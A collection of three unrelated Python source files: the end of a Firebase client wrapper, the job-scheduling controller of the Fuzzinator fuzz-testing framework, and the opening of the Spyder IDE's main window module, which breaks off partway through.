request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def send_password_reset_email(self, email):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/getOobConfirmationCode?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"requestType": "PASSWORD_RESET", "email": email})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def verify_password_reset_code(self, reset_code, new_password):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/resetPassword?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"oobCode": reset_code, "newPassword": new_password})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def create_user_with_email_and_password(self, email, password):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/signupNewUser?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8" }
data = json.dumps({"email": email, "password": password, "returnSecureToken": True})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
class Database:
""" Database Service """
def __init__(self, credentials, api_key, database_url, requests):
if not database_url.endswith('/'):
url = ''.join([database_url, '/'])
else:
url = database_url
self.credentials = credentials
self.api_key = api_key
self.database_url = url
self.requests = requests
self.path = ""
self.build_query = {}
self.last_push_time = 0
self.last_rand_chars = []
def order_by_key(self):
self.build_query["orderBy"] = "$key"
return self
def order_by_value(self):
self.build_query["orderBy"] = "$value"
return self
def order_by_child(self, order):
self.build_query["orderBy"] = order
return self
def start_at(self, start):
self.build_query["startAt"] = start
return self
def end_at(self, end):
self.build_query["endAt"] = end
return self
def equal_to(self, equal):
self.build_query["equalTo"] = equal
return self
def limit_to_first(self, limit_first):
self.build_query["limitToFirst"] = limit_first
return self
def limit_to_last(self, limit_last):
self.build_query["limitToLast"] = limit_last
return self
def shallow(self):
self.build_query["shallow"] = True
return self
def child(self, *args):
new_path = "/".join([str(arg) for arg in args])
if self.path:
self.path += "/{}".format(new_path)
else:
if new_path.startswith("/"):
new_path = new_path[1:]
self.path = new_path
return self
def build_request_url(self, token):
parameters = {}
if token:
parameters['auth'] = token
for param in list(self.build_query):
if type(self.build_query[param]) is str:
parameters[param] = quote('"' + self.build_query[param] + '"')
elif type(self.build_query[param]) is bool:
parameters[param] = "true" if self.build_query[param] else "false"
else:
parameters[param] = self.build_query[param]
# reset path and build_query for next query
request_ref = '{0}{1}.json?{2}'.format(self.database_url, self.path, urlencode(parameters))
self.path = ""
self.build_query = {}
return request_ref
def build_headers(self, token=None):
headers = {"content-type": "application/json; charset=UTF-8"}
if not token and self.credentials:
access_token = self.credentials.get_access_token().access_token
headers['Authorization'] = 'Bearer ' + access_token
return headers
def get(self, token=None, json_kwargs={}):
build_query = self.build_query
query_key = self.path.split("/")[-1]
request_ref = self.build_request_url(token)
# headers
headers = self.build_headers(token)
# do request
request_object = self.requests.get(request_ref, headers=headers)
raise_detailed_error(request_object)
request_dict = request_object.json(**json_kwargs)
# if primitive or simple query return
if isinstance(request_dict, list):
return PyreResponse(convert_list_to_pyre(request_dict), query_key)
if not isinstance(request_dict, dict):
return PyreResponse(request_dict, query_key)
if not build_query:
return PyreResponse(convert_to_pyre(request_dict.items()), query_key)
# return keys if shallow
if build_query.get("shallow"):
return PyreResponse(request_dict.keys(), query_key)
# otherwise sort
sorted_response = None
if build_query.get("orderBy"):
if build_query["orderBy"] == "$key":
sorted_response = sorted(request_dict.items(), key=lambda item: item[0])
elif build_query["orderBy"] == "$value":
sorted_response = sorted(request_dict.items(), key=lambda item: item[1])
else:
sorted_response = sorted(request_dict.items(), key=lambda item: item[1][build_query["orderBy"]])
return PyreResponse(convert_to_pyre(sorted_response), query_key)
def push(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.post(request_ref, headers=headers, data=json.dumps(data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
return request_object.json()
def set(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.put(request_ref, headers=headers, data=json.dumps(data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
return request_object.json()
def update(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.patch(request_ref, headers=headers, data=json.dumps(data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
return request_object.json()
def remove(self, token=None):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.delete(request_ref, headers=headers)
raise_detailed_error(request_object)
return request_object.json()
def stream(self, stream_handler, token=None, stream_id=None):
request_ref = self.build_request_url(token)
return Stream(request_ref, stream_handler, self.build_headers, stream_id)
def check_token(self, database_url, path, token):
if token:
return '{0}{1}.json?auth={2}'.format(database_url, path, token)
else:
return '{0}{1}.json'.format(database_url, path)
def generate_key(self):
push_chars = '-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
now = int(time.time() * 1000)
duplicate_time = now == self.last_push_time
self.last_push_time = now
time_stamp_chars = [0] * 8
for i in reversed(range(0, 8)):
time_stamp_chars[i] = push_chars[now % 64]
now = int(math.floor(now / 64))
new_id = "".join(time_stamp_chars)
if not duplicate_time:
for i in range(0, 12):
self.last_rand_chars.append(int(math.floor(uniform(0, 1) * 64)))
else:
for i in range(0, 11):
if self.last_rand_chars[i] == 63:
self.last_rand_chars[i] = 0
self.last_rand_chars[i] += 1
for i in range(0, 12):
new_id += push_chars[self.last_rand_chars[i]]
return new_id
def sort(self, origin, by_key):
# unpack pyre objects
pyres = origin.each()
new_list = []
for pyre in pyres:
new_list.append(pyre.item)
# sort
data = sorted(dict(new_list).items(), key=lambda item: item[1][by_key])
return PyreResponse(convert_to_pyre(data), origin.key())
class Storage:
""" Storage Service """
def __init__(self, credentials, storage_bucket, requests):
self.storage_bucket = "https://firebasestorage.googleapis.com/v0/b/" + storage_bucket
self.credentials = credentials
self.requests = requests
self.path = ""
if credentials:
client = storage.Client(credentials=credentials, project=storage_bucket)
self.bucket = client.get_bucket(storage_bucket)
def child(self, *args):
new_path = "/".join(args)
if self.path:
self.path += "/{}".format(new_path)
else:
if new_path.startswith("/"):
new_path = new_path[1:]
self.path = new_path
return self
def put(self, file, token=None):
# reset path
path = self.path
self.path = None
if isinstance(file, str):
file_object = open(file, 'rb')
else:
file_object = file
request_ref = self.storage_bucket + "/o?name={0}".format(path)
if token:
headers = {"Authorization": "Firebase " + token}
request_object = self.requests.post(request_ref, headers=headers, data=file_object)
raise_detailed_error(request_object)
return request_object.json()
elif self.credentials:
blob = self.bucket.blob(path)
if isinstance(file, str):
return blob.upload_from_filename(filename=file)
else:
return blob.upload_from_file(file_obj=file)
else:
request_object = self.requests.post(request_ref, data=file_object)
raise_detailed_error(request_object)
return request_object.json()
def delete(self, name):
self.bucket.delete_blob(name)
def download(self, filename, token=None):
# remove leading backlash
path = self.path
url = self.get_url(token)
self.path = None
if path.startswith('/'):
path = path[1:]
if self.credentials:
blob = self.bucket.get_blob(path)
blob.download_to_filename(filename)
else:
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(filename, 'wb') as f:
for chunk in r:
f.write(chunk)
def get_url(self, token):
path = self.path
self.path = None
if path.startswith('/'):
path = path[1:]
if token:
return "{0}/o/{1}?alt=media&token={2}".format(self.storage_bucket, quote(path, safe=''), token)
return "{0}/o/{1}?alt=media".format(self.storage_bucket, quote(path, safe=''))
def list_files(self):
return self.bucket.list_blobs()
def raise_detailed_error(request_object):
try:
request_object.raise_for_status()
except HTTPError as e:
# raise detailed error message
# TODO: Check if we get a { "error" : "Permission denied." } and handle automatically
raise HTTPError(e, request_object.text)
def convert_to_pyre(items):
pyre_list = []
for item in items:
pyre_list.append(Pyre(item))
return pyre_list
def convert_list_to_pyre(items):
pyre_list = []
for item in items:
pyre_list.append(Pyre([items.index(item), item]))
return pyre_list
class PyreResponse:
def __init__(self, pyres, query_key):
self.pyres = pyres
self.query_key = query_key
def val(self):
if isinstance(self.pyres, list):
# unpack pyres into OrderedDict
pyre_list = []
# if firebase response was a list
if isinstance(self.pyres[0].key(), int):
for pyre in self.pyres:
pyre_list.append(pyre.val())
return pyre_list
# if firebase response was a dict with keys
for pyre in self.pyres:
pyre_list.append((pyre.key(), pyre.val()))
return OrderedDict(pyre_list)
else:
# return primitive or simple query results
return self.pyres
def key(self):
return self.query_key
def each(self):
if isinstance(self.pyres, list):
return self.pyres
class Pyre:
def __init__(self, item):
self.item = item
def val(self):
return self.item[1]
def key(self):
return self.item[0]
class KeepAuthSession(Session):
"""
A session that doesn't drop Authentication on redirects between domains.
"""
def rebuild_auth(self, prepared_request, response):
pass
class ClosableSSEClient(SSEClient):
def __init__(self, *args, **kwargs):
self.should_connect = True
super(ClosableSSEClient, self).__init__(*args, **kwargs)
def _connect(self):
if self.should_connect:
super(ClosableSSEClient, self)._connect()
else:
raise StopIteration()
def close(self):
self.should_connect = False
self.retry = 0
self.resp.raw._fp.fp.raw._sock.shutdown(socket.SHUT_RDWR)
self.resp.raw._fp.fp.raw._sock.close()
class Stream:
def __init__(self, url, stream_handler, build_headers, stream_id):
self.build_headers = build_headers
self.url = url
self.stream_handler = stream_handler
self.stream_id = stream_id
self.sse = None
self.thread = None
self.start()
def make_session(self):
"""
Return a custom session object to be passed to the ClosableSSEClient.
"""
session = KeepAuthSession()
return session
def start(self):
self.thread = threading.Thread(target=self.start_stream)
self.thread.start()
return self
def start_stream(self):
self.sse = ClosableSSEClient(self.url, session=self.make_session(), build_headers=self.build_headers)
for msg in self.sse:
if msg:
msg_data = json.loads(msg.data)
msg_data["event"] = msg.event
if self.stream_id:
msg_data["stream_id"] = self.stream_id
self.stream_handler(msg_data)
def close(self):
while not self.sse and not hasattr(self.sse, 'resp'):
time.sleep(0.001)
self.sse.running = False
self.sse.close()
self.thread.join()
return self
|
controller.py
|
# Copyright (c) 2016-2022 Renata Hodovan, Akos Kiss.
#
# Licensed under the BSD 3-Clause License
# <LICENSE.rst or https://opensource.org/licenses/BSD-3-Clause>.
# This file may not be copied, modified, or distributed except
# according to those terms.
import os
import shutil
import time
import traceback
from math import inf
from multiprocessing import Lock, Process, Queue
import psutil
from .config import as_bool, as_int_or_inf, as_path, config_get_fuzzers, config_get_kwargs, config_get_object
from .job import FuzzJob, ReduceJob, UpdateJob, ValidateJob
from .listener import ListenerManager
from .mongo_driver import MongoDriver
class Controller(object):
"""
Fuzzinator's main controller that orchestrates a fuzz session by scheduling
all related activities (e.g., keeps SUTs up-to-date, runs fuzzers and feeds
test cases to SUTs, or minimizes failure inducing test cases). All
configuration options of the framework must be encapsulated in a
:class:`configparser.ConfigParser` object.
The following config sections and options are recognized:
- Section ``fuzzinator``: Global settings of the framework.
- Option ``work_dir``: Pattern of work directory for temporary files,
which may contain the substring ``{uid}`` as a placeholder for a
unique string (replaced by the framework). (Optional, default:
``~/.fuzzinator/{uid}``)
- Option ``db_uri``: URI to a MongoDB database to store found issues and
execution statistics. (Optional, default:
``mongodb://localhost/fuzzinator``)
- Option ``db_server_selection_timeout``: Controls how long the database
driver will wait to find an available server (in milliseconds).
(Optional, default: 30000)
- Option ``cost_budget``: (Optional, default: number of cpus)
- Option ``validate_after_update``: Boolean to enable the validation
of valid issues of all SUTs after their update.
(Optional, default: ``False``)
- Sections ``sut.NAME``: Definitions of a SUT named *NAME*
- Option ``call``: Fully qualified name of a callable context manager
class. When an instance of the class is called, it must accept a
``test`` keyword argument representing the input to the SUT and must
return a dictionary object if the input triggered an issue in the SUT,
or a value considered false otherwise (which can be a simple ``None``,
but can also be a ``NonIssue`` in complex cases). The returned issue
dictionary (if any) *should* contain an ``'id'`` field that equals for
issues that are not considered unique. (Mandatory)
See package :mod:`fuzzinator.call` for potential SUT calls.
- Option ``cost``: (Optional, default: 1)
- Option ``validate_call``: Fully qualified name of a callable context
manager class that acts as the SUT's ``call`` option during test case
validation. (Optional, default: the value of option ``call``)
See package :mod:`fuzzinator.call` for potential SUT calls.
- Option ``validate_cost``: (Optional, default: the value of option
``cost``)
- Option ``reduce``: Fully qualified name of a callable class. When an
instance of the class is called, it must accept ``issue``,
``sut_call``, ``on_job_progressed`` keyword arguments representing
an issue to be reduced, and must return a tuple consisting of a
reduced test case for the issue (or ``None`` if the issue's current
test case could not be reduced) and a (potentially empty) list of new
issues that were discovered during test case reduction (if any).
(Optional, no reduction for this SUT if option is missing.)
See package :mod:`fuzzinator.reduce` for potential reducers.
- Option ``reduce_call``: Fully qualified name of a callable context
manager class that acts as the SUT's ``call`` option during test case
reduction. (Optional, default: the value of option ``validate_call``
if defined, otherwise the value of option ``call``)
See package :mod:`fuzzinator.call` for potential SUT calls.
- Option ``reduce_cost``: (Optional, default: the value of option
``cost``)
- Option ``update_condition``: Fully qualified name of a callable class.
When an instance of the class is called, it must return ``True`` if
and only if the SUT should be updated. (Optional, SUT is never updated
automatically if option is missing.)
See package :mod:`fuzzinator.update` for potential update conditions.
- Option ``update``: Fully qualified name of a callable class. When an
instance of the class is called, it should perform the update of the
SUT. (Optional, SUT is never updated if option is missing.)
See package :mod:`fuzzinator.update` for potential updaters.
- Option ``update_cost``: (Optional, default: the value of option
``fuzzinator:cost_budget``)
- Option ``validate_after_update``: Boolean to enable the validation
of the valid issues of the SUT after its update. (Optional, default:
the value of option ``fuzzinator:validate_after_update``)
- Option ``formatter``: Fully qualified name of a callable class. When
an instance of the class is called, it must format the issue
dictionary of the SUT by returning a custom string representation. It
must accept an ``issue`` keyword argument representing an issue to be
formatted. The class must also contain a method named ``summary``,
also accepting an ``issue`` keyword argument, which should return a
summary description (preferably a single line of text). (Optional,
default: :func:`fuzzinator.formatter.JsonFormatter`.)
See package :mod:`fuzzinator.formatter` for further potential
formatters.
- Options ``tui_formatter``, ``wui_formatter``, and ``email_formatter``:
Fully qualified name of a callable class that formats the issue
dictionary of the SUT to display it in the TUI issue viewer, on the
WUI issue page, or to insert it into an e-mail notification.
(Optional, default: the value of option ``formatter``)
See package :mod:`fuzzinator.formatter` for potential formatters.
- Option ``exporter``: Fully qualified name of a callable class. When an
instance of the class is called, it must export the issue dictionary
in a custom SUT-specific format. It must accept an ``issue`` keyword
argument representing the issue to be exported and its result must be
writable to a file, i.e., it must be either a string or a byte array.
The export format does not necessarily have to contain all elements of
the issue dictionary (e.g., it is often useful to only extract the
test input that triggered the issue). (Optional, no custom export for
this SUT if option is missing.)
See package :mod:`fuzzinator.exporter` for potential exporters.
- Option ``tracker``: Fully qualified name of a class that can report
issues to an external issue tracker. (Optional, no reporting to
tracker if option is missing.)
See package :mod:`fuzzinator.tracker` for potential trackers.
- Sections ``fuzz.NAME``: Definitions of a fuzz job named *NAME*
- Option ``sut``: Name of the SUT that describes the subject of
this fuzz job. (Mandatory)
- Option ``fuzzer``: Fully qualified name of a callable context manager
class. When an instance of the class is called, it must accept an
``index`` keyword argument representing a running counter in the fuzz
job and must return a test input (or ``None``, which signals that the
fuzzer is "exhausted" and cannot generate more test cases in this fuzz
job). The semantics of the generated test input is not restricted by
the framework, it is up to the configuration to ensure that the SUT of
the fuzz job can deal with the tests generated by the fuzzer of the
fuzz job. (Mandatory)
See package :mod:`fuzzinator.fuzzer` for potential fuzzers.
- Option ``batch``: Number of times the fuzzer is requested to generate
a new test for the SUT. (Optional, default: 1)
- Option ``instances``: Number of instances of this fuzz job allowed to
run in parallel. (Optional, default: ``inf``)
- Option ``refresh``: Statistics update frequency in terms of executed
test cases. (Optional, default: ``batch`` size)
- Section ``listeners``: Definitions of custom event listeners.
This section is optional.
- Options ``OPT``: Fully qualified name of a class that executes custom
actions for selected events.
See package :mod:`fuzzinator.listener` for potential listeners.
- For classes referenced in options with their fully qualified name,
constructor keyword arguments can be given. These arguments have to be
specified in sections ``(sut|fuzz).NAME.OPT`` with appropriate names.
- All classes can be decorated according to python semantics. The
decorators must be callable classes and have to be specified in options
``OPT.decorate(N)`` with fully qualified name. Multiple decorators can
be applied to a class ``OPT``, their order is specified by an integer
index in parentheses. Keyword arguments to be passed to the decorators
have to be listed in sections ``(sut|fuzz).NAME.OPT.decorate(N)``.
See packages :mod:`fuzzinator.call` and :mod:`fuzzinator.fuzzer` for
potential decorators.
- The constructors of all classes (including decorators) can have a
``work_dir`` keyword argument. If present, its value is not filled in
from the corresponding section but provided by the framework with a
unique path under ``fuzzinator:work_dir``.
"""
def __init__(self, config):
"""
:param ~configparser.ConfigParser config: the configuration options of
the fuzz session.
:ivar ListenerManager listener: a listener manager object that is called
on various events during the fuzz session.
"""
self.config = config
work_dir = self.config.get('fuzzinator', 'work_dir').format(uid=os.getpid())
self.config.set('fuzzinator', 'work_dir', work_dir.replace('$', '$$'))
self.work_dir = as_path(work_dir)
self.fuzzers = config_get_fuzzers(self.config)
self.capacity = int(self.config.get('fuzzinator', 'cost_budget'))
self.validate_after_update = as_bool(self.config.get('fuzzinator', 'validate_after_update'))
self.db = MongoDriver(self.config.get('fuzzinator', 'db_uri'),
int(self.config.get('fuzzinator', 'db_server_selection_timeout')))
self.db.init_db(self.fuzzers)
self.session_start = time.time()
self.session_baseline = self.db.get_stats()
self.listener = ListenerManager()
for name in config_get_kwargs(self.config, 'listeners'):
self.listener += config_get_object(self.config, 'listeners', name, init_kwargs=dict(config=config))
self._shared_queue = Queue()
self._shared_lock = Lock()
def run(self, *, max_cycles=None, validate=None, reduce=None):
"""
Start the fuzz session.
:param int max_cycles: maximum number to iterate through the fuzz jobs
defined in the configuration (defaults to ``inf``).
:param str validate: name of SUT to validate issues of at the start of
the fuzz session (the empty string denotes all SUTs; defaults to no
SUT).
:param str reduce: name of SUT to reduce issues of at the start of the
fuzz session (the empty string denotes all SUTs; defaults to no
SUT).
"""
max_cycles = max_cycles if max_cycles is not None else inf
cycle = 0
fuzz_idx = 0
fuzz_names = list(self.fuzzers)
load = 0
job_id = 0
job_queue = []
running_jobs = {}
def _update_load():
current_load = 0
for job_id in list(running_jobs):
if not running_jobs[job_id]['proc'].is_alive() or not psutil.pid_exists(running_jobs[job_id]['proc'].pid):
self.listener.on_job_removed(job_id=job_id)
del running_jobs[job_id]
else:
current_load += running_jobs[job_id]['job'].cost
nonlocal load
if load != current_load:
load = current_load
self.listener.on_load_updated(load=load)
def _poll_jobs():
with self._shared_lock:
while not self._shared_queue.empty():
job_class, job_kwargs, priority = self._shared_queue.get_nowait()
if job_class is not None:
_add_job(job_class, job_kwargs, priority)
else:
_cancel_job(**job_kwargs)
def _add_job(job_class, job_kwargs, priority):
nonlocal job_id
next_job = job_class(id=job_id,
config=self.config,
db=self.db,
listener=self.listener,
**job_kwargs)
job_id += 1
if priority:
next_job.cost = 0
{
FuzzJob:
lambda: self.listener.on_fuzz_job_added(job_id=next_job.id,
cost=next_job.cost,
sut=next_job.sut_name,
fuzzer=next_job.fuzzer_name,
batch=next_job.batch),
ValidateJob:
lambda: self.listener.on_validate_job_added(job_id=next_job.id,
cost=next_job.cost,
sut=next_job.sut_name,
issue_oid=next_job.issue['_id'],
issue_id=next_job.issue['id']),
ReduceJob:
lambda: self.listener.on_reduce_job_added(job_id=next_job.id,
cost=next_job.cost,
sut=next_job.sut_name,
issue_oid=next_job.issue['_id'],
issue_id=next_job.issue['id'],
size=len(str(next_job.issue['test']))),
UpdateJob:
lambda: self.listener.on_update_job_added(job_id=next_job.id,
cost=next_job.cost,
sut=next_job.sut_name),
}[job_class]()
job_queue.insert(0 if priority else len(job_queue), next_job)
def _cancel_job(job_id):
if job_id in running_jobs:
Controller.kill_process_tree(running_jobs[job_id]['proc'].pid)
else:
job_idx = [job_idx for job_idx, job in enumerate(job_queue) if job.id == job_id]
if job_idx:
self.listener.on_job_removed(job_id=job_id)
del job_queue[job_idx[0]]
if validate is not None:
self.validate_all(sut_name=validate)
if reduce is not None:
self.reduce_all(sut_name=reduce)
try:
while True:
# Update load and poll added jobs (if any).
_poll_jobs()
_update_load()
if fuzz_idx == 0:
cycle += 1
if cycle > max_cycles or (not self.fuzzers and max_cycles != inf):
while load > 0:
time.sleep(1)
_poll_jobs() # only to let running jobs cancelled; newly added jobs don't get scheduled
_update_load()
break
# Hunt for new issues only if there is no other work to do.
if not job_queue:
if not self.fuzzers:
time.sleep(1)
continue
# Determine fuzz job to be queued and then update fuzz_idx
# to point to the next job's parameters.
fuzzer_name = fuzz_names[fuzz_idx]
fuzz_section = 'fuzz.' + fuzzer_name
fuzz_idx = (fuzz_idx + 1) % len(self.fuzzers)
# Skip fuzz job if limit on parallel instances is reached.
instances = as_int_or_inf(self.config.get(fuzz_section, 'instances', fallback='inf'))
if instances <= sum(1 for job in running_jobs.values() if isinstance(job['job'], FuzzJob) and job['job'].fuzzer_name == fuzzer_name):
continue
# Before queueing a new fuzz job, check if we are working
# with the latest version of the SUT and queue an update if
# needed.
sut_name = self.config.get(fuzz_section, 'sut')
update_condition = config_get_object(self.config, 'sut.' + sut_name, 'update_condition')
if update_condition and update_condition():
self.add_update_job(sut_name)
self.add_fuzz_job(fuzzer_name)
# Poll newly added job(s). Looping ensures that jobs will
# eventually arrive.
# (Unfortunately, multiprocessing.Queue.empty() is unreliable.)
while not job_queue:
_poll_jobs()
# Perform next job as soon as there is enough capacity for it.
while True:
if not job_queue:
next_job = None
break
if load + job_queue[0].cost <= self.capacity:
next_job = job_queue.pop(0)
break
time.sleep(1)
_poll_jobs()
_update_load()
if not next_job:
continue
proc = Process(target=self._run_job, args=(next_job,))
running_jobs[next_job.id] = dict(job=next_job, proc=proc)
self.listener.on_job_activated(job_id=next_job.id)
proc.start()
except KeyboardInterrupt:
pass
except Exception as e:
self.listener.warning(job_id=None, msg='Exception in the main controller loop: {exception}\n{trace}'.format(exception=e, trace=traceback.format_exc()))
finally:
Controller.kill_process_tree(os.getpid(), kill_root=False)
if os.path.exists(self.work_dir):
shutil.rmtree(self.work_dir, ignore_errors=True)
def _run_job(self, job):
try:
for issue in job.run():
# Automatic reduction and/or validation if the job found something new
if not self.add_reduce_job(issue=issue):
self.add_validate_job(issue=issue)
except Exception as e:
self.listener.warning(job_id=job.id, msg='Exception in {job}: {exception}\n{trace}'.format(
job=repr(job),
exception=e,
trace=traceback.format_exc()))
def add_fuzz_job(self, fuzzer_name, priority=False):
# Added for the sake of completeness and consistency.
# Should not be used by UI to add fuzz jobs.
with self._shared_lock:
self._shared_queue.put((FuzzJob, dict(fuzzer_name=fuzzer_name, subconfig_id=self.fuzzers[fuzzer_name]['subconfig']), priority))
return True
def add_validate_job(self, issue, priority=False):
if not self.config.has_section('sut.' + issue['sut']):
return False
with self._shared_lock:
self._shared_queue.put((ValidateJob, dict(issue=issue), priority))
return True
def add_reduce_job(self, issue, priority=False):
if not self.config.has_option('sut.' + issue['sut'], 'reduce'):
return False
with self._shared_lock:
self._shared_queue.put((ReduceJob, dict(issue=issue), priority))
return True
def add_update_job(self, sut_name, priority=False):
if not self.config.has_option('sut.' + sut_name, 'update'):
return False
with self._shared_lock:
self._shared_queue.put((UpdateJob, dict(sut_name=sut_name), priority))
if as_bool(self.config.get('sut.' + sut_name, 'validate_after_update', fallback=self.validate_after_update)):
self.validate_all(sut_name)
return True
def validate_all(self, sut_name=None):
sut_name = [sut_name] if sut_name else [section.split('.', maxsplit=1)[1] for section in self.config.sections() if section.startswith('sut.') and section.count('.') == 1]
for issue in self.db.find_issues_by_suts(sut_name):
if not issue.get('invalid'):
self.add_validate_job(issue)
def reduce_all(self, sut_name=None):
sut_name = [sut_name] if sut_name else [section.split('.', maxsplit=1)[1] for section in self.config.sections() if section.startswith('sut.') and section.count('.') == 1]
for issue in self.db.find_issues_by_suts(sut_name):
if not issue.get('reported') and not issue.get('reduced') and not issue.get('invalid'):
self.add_reduce_job(issue)
def cancel_job(self, job_id):
with self._shared_lock:
self._shared_queue.put((None, dict(job_id=job_id), None))
return True
@staticmethod
def kill_process_tree(pid, kill_root=True):
try:
root_proc = psutil.Process(pid)
children = root_proc.children(recursive=True)
if kill_root:
children.append(root_proc)
for proc in children:
try:
proc.terminate()
except psutil.Error:
pass
_, alive = psutil.wait_procs(children, timeout=1)
for proc in alive:
try:
proc.kill()
except psutil.Error:
pass
except psutil.NoSuchProcess:
pass
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
from collections import OrderedDict
from enum import Enum
import errno
import gc
import logging
import os
import os.path as osp
import shutil
import signal
import socket
import glob
import sys
import threading
import traceback
#==============================================================================
# Check requirements before proceeding
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Third-party imports
#==============================================================================
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QCoreApplication, Qt, QTimer, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QIcon, QKeySequence
from qtpy.QtWidgets import (QAction, QApplication, QMainWindow, QMenu,
QMessageBox, QShortcut, QStyleFactory, QCheckBox)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
from qtawesome.iconic_font import FontError
#==============================================================================
# Local imports
# NOTE: Move (if possible) import's of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
#==============================================================================
from spyder import __version__
from spyder import dependencies
from spyder.app import tour
from spyder.app.utils import (create_splash_screen, delete_lsp_log_files,
qt_message_handler, set_links_color,
setup_logging, set_opengl_implementation, Spy)
from spyder.config.base import (_, DEV, get_conf_path, get_debug_level,
get_home_dir, get_module_source_path,
get_safe_mode, is_pynsist, running_in_mac_app,
running_under_pytest, STDERR)
from spyder.utils.image_path_manager import get_image_path
from spyder.config.gui import is_dark_font_color
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.manager import CONF
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.otherplugins import get_spyderplugins_mods
from spyder.py3compat import configparser as cp, PY3, to_text_string
from spyder.utils import encoding, programs
from spyder.utils.icon_manager import ima
from spyder.utils.misc import (select_port, getcwd_or_home,
get_python_executable)
from spyder.utils.palette import QStylePalette
from spyder.utils.qthelpers import (create_action, add_actions, file_uri,
qapplication, start_file)
from spyder.utils.stylesheet import APP_STYLESHEET
from spyder.app.solver import (
find_external_plugins, find_internal_plugins, solve_plugin_dependencies)
# Spyder API Imports
from spyder.api.exceptions import SpyderAPIError
from spyder.api.plugins import Plugins, SpyderPluginV2, SpyderDockablePlugin
#==============================================================================
# Windows only local imports
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Constants
#==============================================================================
# Module logger
logger = logging.getLogger(__name__)
# Keeping a reference to the original sys.exit before patching it
ORIGINAL_SYS_EXIT = sys.exit
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
CWD = getcwd_or_home()
# Set the index for the default tour
DEFAULT_TOUR = 0
#==============================================================================
# Install Qt messaage handler
#==============================================================================
qInstallMessageHandler(qt_message_handler)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = (
QMainWindow.AllowTabbedDocks | QMainWindow.AllowNestedDocks |
QMainWindow.AnimatedDocks
)
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
sig_setup_finished = Signal()
all_actions_defined = Signal()
# type: (OrderedDict, OrderedDict)
sig_pythonpath_changed = Signal(object, object)
sig_main_interpreter_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # Related to interactive tour
sig_moved = Signal("QMoveEvent") # Related to interactive tour
sig_layout_setup_ready = Signal(object) # Related to default layouts
# --- Plugin handling methods
# ------------------------------------------------------------------------
def get_plugin(self, plugin_name, error=True):
"""
Return a plugin instance by providing the plugin class.
"""
for name, plugin in self._PLUGINS.items():
if plugin_name == name:
return plugin
else:
if error:
raise SpyderAPIError(
'Plugin "{}" not found!'.format(plugin_name))
else:
return None
def show_status_message(self, message, timeout):
"""
Show a status message in Spyder Main Window.
"""
status_bar = self.statusBar()
if status_bar.isVisible():
status_bar.showMessage(message, timeout)
def show_plugin_compatibility_message(self, message):
"""
Show a compatibility message.
"""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle(_('Compatibility Check'))
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def add_plugin(self, plugin, external=False):
"""
Add plugin to plugins dictionary.
"""
self._PLUGINS[plugin.NAME] = plugin
if external:
self._EXTERNAL_PLUGINS[plugin.NAME] = plugin
else:
self._INTERNAL_PLUGINS[plugin.NAME] = plugin
def register_plugin(self, plugin, external=False, omit_conf=False):
"""
Register a plugin in Spyder Main Window.
"""
